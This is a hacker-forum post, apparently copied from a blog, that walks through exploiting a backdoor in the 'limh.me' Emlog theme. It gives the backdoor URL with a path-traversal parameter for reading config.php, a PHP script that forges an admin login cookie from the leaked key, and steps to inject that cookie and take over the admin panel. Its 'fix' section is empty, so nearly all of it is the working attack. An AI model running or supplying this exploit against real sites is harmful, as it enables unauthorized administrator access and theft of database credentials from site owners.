• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM



Recommended Posts

  • Members

0x01 前言


0x02 搜索关键词


Emlog模板明月浩空后门利用解析-Ti0s's Blog

0x03 已知后门地址

view-source: + 域名 + /content/templates/limh.me/function/image.php?url=../../../../config.php

Emlog模板明月浩空后门利用解析-Ti0s's Blog

这是一个任意文件内容读取的后门 可以读取 数据库等重要信息,这里我们利用计算Emlog 的Cookie来进行伪造管理员登录。

0x04 计算Cookie脚本

$time=time() + 60 * 60 * 24 * 30 * 12;
$key = hash_hmac('md5', 'admin|' . $time, '*****************************'); //这个是Key,admin为要欺骗的管理名
$hash=hash_hmac('md5', 'admin|' . $time, $key); //admin为要欺骗的管理名
$cookie='admin|' . $time."|".$hash; //admin为要欺骗的管理名
echo $cookie;
setcookie("*****************************",$cookie); //这个是cookiename

Emlog模板明月浩空后门利用解析-Ti0s's Blog

计算出后,进入后台 默认地址 /admin 利用火狐的插件Cookie Edit加入Cookie Name是 AUTH_COOKIE_NAME 值为计算的

Emlog模板明月浩空后门利用解析-Ti0s's Blog

然后刷新网页 伪造cookie成功

Emlog模板明月浩空后门利用解析-Ti0s's Blog



0x05 修复方法


Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now